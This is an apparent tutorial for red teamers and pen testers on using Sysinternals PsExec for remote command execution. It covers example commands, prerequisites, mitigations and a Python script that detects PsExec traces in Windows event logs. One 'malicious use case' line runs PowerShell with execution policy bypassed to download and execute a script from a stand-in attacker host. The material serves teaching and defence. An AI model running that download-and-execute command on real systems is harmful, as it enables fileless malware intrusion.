As a red teamer or a pen tester, one of your primary objectives is to identify and exploit vulnerabilities in your target systems. One way to do this is by using remote code execution (RCE) techniques. Remote code execution is a class of vulnerability that allows an attacker to run code on a target system over the network. There are several tools and techniques available to achieve RCE, and one of the most commonly used is PsExec. In this article, we will explore what PsExec is, how it works, and how it can be used by a red teamer or a pen tester to achieve RCE on a target system.

What is PsExec?

PsExec is a powerful command-line tool developed by Sysinternals (now part of Microsoft) that allows system administrators to execute processes remotely on one or more machines in a network. PsExec can be used to run commands, start services, or launch applications on remote systems. It works by using a combination of Windows APIs and remote procedure calls (RPCs) to establish a connection with a remote machine and then execute a command or a process on that machine.

How PsExec Works

To understand how PsExec works, let’s look at the different steps involved in using PsExec to execute a command remotely:

Step 1: Establishing a Connection

The first step in using PsExec is to establish a connection with the target system. To do this, PsExec uses the Windows Service Control Manager (SCM) to start a service called PsExecSvc on the target system. PsExecSvc is a small service that runs as the Local System account and listens for incoming connections from PsExec.

Step 2: Authenticating

Once the connection is established, PsExec sends authentication credentials to the target system to authenticate the user who is trying to access the system. The credentials can be provided in several ways, including by using the -u and -p command-line switches, which allow you to specify a username and password, respectively.

Step 3: Executing the Command

After the user is authenticated, PsExec executes the command on the remote system. The command can be any valid command or executable file that can be executed on the target system. PsExec captures the output of the command and displays it on the local system.

Examples of PsExec Usage

Now that we understand how PsExec works, let’s look at some examples of how it can be used in a red team or pen testing scenario.

Example 1: Retrieving System Information

One of the simplest things you can do with PsExec is to retrieve system information from a remote system. For example, to retrieve the system information of a machine with the IP address 192.168.1.100, you can run the following command:

psexec \\192.168.1.100 systeminfo

This command will connect to the remote system, execute the systeminfo command, and display the results on your local system.

Example 2: Running Commands on Multiple Systems

PsExec also allows you to run commands on multiple systems simultaneously. For example, to execute the ipconfig command on three remote systems with IP addresses 192.168.1.100, 192.168.1.101, and 192.168.1.102, you can run the following command:

psexec \\192.168.1.100,192.168.1.101,192.168.1.102 ipconfig

This command will execute the ipconfig command on all three remote systems and display the results on your local system.

Example 3: Launching Applications

PsExec can also be used to launch applications on remote systems. For example, to launch the notepad.exe application on a remote system with IP address 192.168.1.100, you can run the following command:

psexec \\192.168.1.100 notepad.exe

This command will launch the Notepad application on the remote system and display it on your local system.

Example 4: Starting Services

PsExec can also be used to start services on remote systems. For example, to start the Windows Remote Management (WinRM) service on a remote system with IP address 192.168.1.100, you can run the following command:

psexec \\192.168.1.100 net start winrm

This command will start the WinRM service on the remote system.

Example 5: Malicious Use Case

While PsExec can be a useful tool for system administrators, it can also be used maliciously by attackers to achieve RCE on a target system. For example, an attacker could use PsExec to execute a malware payload on a remote system by running the following command:

psexec \\192.168.1.100 cmd.exe /c "powershell.exe -ExecutionPolicy Bypass -Command \"iex (New-Object Net.WebClient).DownloadString('http://attacker.com/malware.ps1')\""

This command will connect to the remote system, execute the cmd.exe command, and then execute a PowerShell script that downloads and executes a malware payload from a remote server controlled by the attacker. This technique is known as a “fileless” malware attack, as it does not involve writing any files to the target system’s disk.

Prerequisites

Before using PsExec to execute commands remotely on a target system, there are several prerequisites that must be met:

  1. Network Connectivity: PsExec requires network connectivity between the local system and the target system. Make sure that the target system is reachable from the local system and that there are no network firewalls or restrictions that could prevent the connection.
  2. Administrative Access: PsExec requires administrative access to the target system. Make sure that you have administrative privileges on the target system or that you have access to an account with administrative privileges.
  3. Windows Firewall: PsExec uses the Windows Service Control Manager (SCM) and remote procedure calls (RPCs) to establish a connection with the target system. Make sure that the Windows Firewall is not blocking these ports (TCP/445 and TCP/135).
  4. PsExec Executable: PsExec is a standalone executable that can be downloaded from the Microsoft Sysinternals website. Make sure that you have the latest version of PsExec and that it is accessible from the command prompt or from the directory where you are executing the command.
  5. Authentication Credentials: PsExec requires authentication credentials to connect to the target system. Make sure that you have a valid username and password or that you are using an account with administrative privileges.

By ensuring that these prerequisites are met, you can use PsExec to execute commands remotely on a target system and test the security of your environment.

Mitigating PsExec-Based Attacks

To mitigate PsExec-based attacks, there are several steps that system administrators can take, including:

  1. Disable the PsExec service (PsExecSvc) on all machines that do not require its use.
  2. Restrict the use of PsExec to authorized users and limit the systems that it can be used on.
  3. Monitor network traffic for any signs of PsExec-based attacks, such as unusual connections to PsExec ports (TCP/445 and TCP/135).
  4. Deploy endpoint protection solutions that can detect and block known PsExec-based attack techniques.
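The service installation described in Step 1 and the monitoring advice in item 3 above point at the same host-side telemetry. The following Python script is an added example, not part of this article: it runs a small rule set over constructed Windows event records (System 7045 service installs, Security 5145 share access, Sysmon 17/18 named pipes) and flags the traces a PsExec run leaves, using the service name as it actually appears in logs, PSEXESVC (the article's PsExecSvc), and PsExec's default pipe names; the event field names are assumed to have been normalised from the event XML.

```python
import re
# Added example, not from the article: host-side detection of the traces a PsExec
# run leaves (the service the article calls PsExecSvc is logged as PSEXESVC).
# Field names are my assumed normalisation of Windows event XML; samples are constructed.
PSEXESVC_RE = re.compile(r"psexesvc", re.IGNORECASE)
# Default pipes PsExec opens: \PSEXESVC and \PSEXESVC-<client>-<pid>-std{in,out,err}
PIPE_RE = re.compile(r"^\\PSEXESVC(-.+-\d+-std(in|out|err))?$", re.IGNORECASE)

def svc_install(ev):  # System 7045: a new service was installed
    if PSEXESVC_RE.search(ev.get("ServiceName", "") + ev.get("ImagePath", "")):
        return f"service {ev['ServiceName']} installed from {ev['ImagePath']}"
    return None

def pipe_event(ev):  # Sysmon 17/18: named pipe created or connected
    if PIPE_RE.match(ev.get("PipeName", "")):
        return f"PsExec-style pipe {ev['PipeName']} by {ev.get('Image', '?')}"
    return None

def share_access(ev):  # Security 5145: object accessed on a network share
    if ev.get("ShareName", "").upper().endswith("ADMIN$") and PSEXESVC_RE.search(ev.get("RelativeTargetName", "")):
        return f"{ev['RelativeTargetName']} accessed via ADMIN$ from {ev.get('IpAddress', '?')}"
    return None

RULES = {("System", 7045): svc_install, ("Sysmon", 17): pipe_event,
         ("Sysmon", 18): pipe_event, ("Security", 5145): share_access}

def detect(events):
    """Return (host, finding) pairs for every event that matches a rule."""
    findings = []
    for ev in events:
        rule = RULES.get((ev["log"], ev["id"]))
        if rule and (hit := rule(ev)):
            findings.append((ev["host"], hit))
    return findings

SAMPLE_EVENTS = [  # constructed: one PsExec run against WS01 plus benign noise
    {"log": "Security", "id": 5145, "host": "WS01", "ShareName": "\\\\*\\ADMIN$",
     "RelativeTargetName": "PSEXESVC.exe", "IpAddress": "192.168.1.50"},
    {"log": "System", "id": 7045, "host": "WS01", "ServiceName": "PSEXESVC",
     "ImagePath": "%SystemRoot%\\PSEXESVC.exe"},
    {"log": "Sysmon", "id": 17, "host": "WS01", "PipeName": "\\PSEXESVC",
     "Image": "C:\\Windows\\PSEXESVC.exe"},
    {"log": "Sysmon", "id": 18, "host": "WS01", "Image": "C:\\Windows\\PSEXESVC.exe",
     "PipeName": "\\PSEXESVC-SRV01-4412-stdin"},
    {"log": "System", "id": 7045, "host": "WS02", "ServiceName": "VBoxService",
     "ImagePath": "C:\\Windows\\System32\\VBoxService.exe"},
]

if __name__ == "__main__":
    for host, finding in detect(SAMPLE_EVENTS):
        print(f"[{host}] {finding}")
```

Watching TCP/445 alone is noisy because every SMB client uses that port; the service install, ADMIN$ access and named-pipe events narrow the alert to the PsExec pattern itself.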

Conclusion

PsExec is a powerful tool that can be used by system administrators to remotely execute commands on multiple systems simultaneously. However, it can also be used maliciously by attackers to achieve RCE on a target system. Red teamers and pen testers can use PsExec to test the security of their target systems and identify vulnerabilities that could be exploited by attackers. By understanding how PsExec works and how it can be used, security professionals can better defend against PsExec-based attacks and protect their systems from compromise.